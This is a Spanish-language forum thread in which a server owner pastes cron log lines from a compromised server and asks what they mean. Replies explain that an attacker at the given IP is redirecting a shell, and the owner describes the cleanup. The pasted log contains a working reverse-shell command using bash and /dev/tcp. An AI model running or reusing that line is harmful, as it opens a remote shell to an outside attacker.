26/05/2013, 20:19
| ||||
| ||||
| servidor inestable el servidor esta continuamente cayéndose estoy faroleando los logs y aparte de que tiene una actividad frénetica de correos que parece ser que me mando entre cuentas de correo de mis dominios que no existen he visto esto May 27 04:13:01 vds-854045 /USR/SBIN/CRON[19459]: (psaadm) CMD (/var/tmp/pdflush >/dev/null 2>&1) May 27 04:13:01 vds-854045 /USR/SBIN/CRON[19461]: (root) CMD (/bin/bash -i > /dev/tcp/208.84.200.14/443 0<&1 2> alguien sabria decirme que hace eso? |
|
31/05/2013, 04:54
| |||
| |||
| Respuesta: servidor inestable Ponte en contacto con tu empresa de hosting y que te echen una mano, parece que tienes algún problema de ataque o vulnerabilidad. Suerte!
__________________ - Digital Valley - Servidores Dedicados, VPS, Cloud Hosting, Alojamiento Web, Wordpress. |
|
31/05/2013, 07:18
| ||||
| ||||
| Respuesta: servidor inestable un atacante remoto (208.84.200.14) está redireccionando una consola a su pc Extremadamente grave, sugiero que de inmediato contactes a tu proveedor o algún experto que pueda prestarte ayuda |
|
02/06/2013, 21:06
| ||||
| ||||
| Respuesta: servidor inestable he eliminado el cron, creado un nuevo usuario estandar, desactivado el usuario root y he retirado todo el php que creo que fue el culpable y todos los archivos editados desde la fecha que subí aquellos al servidor... echándole un vistazo a los logs ya no parece que se ejecute absolutamente nada que no esperaba que se ejecutase desde hace una semana y tampoco he visto ningún login inesperado en esta semana. esto está bien así o debería comprobar algo mas? |
| Etiquetas: |
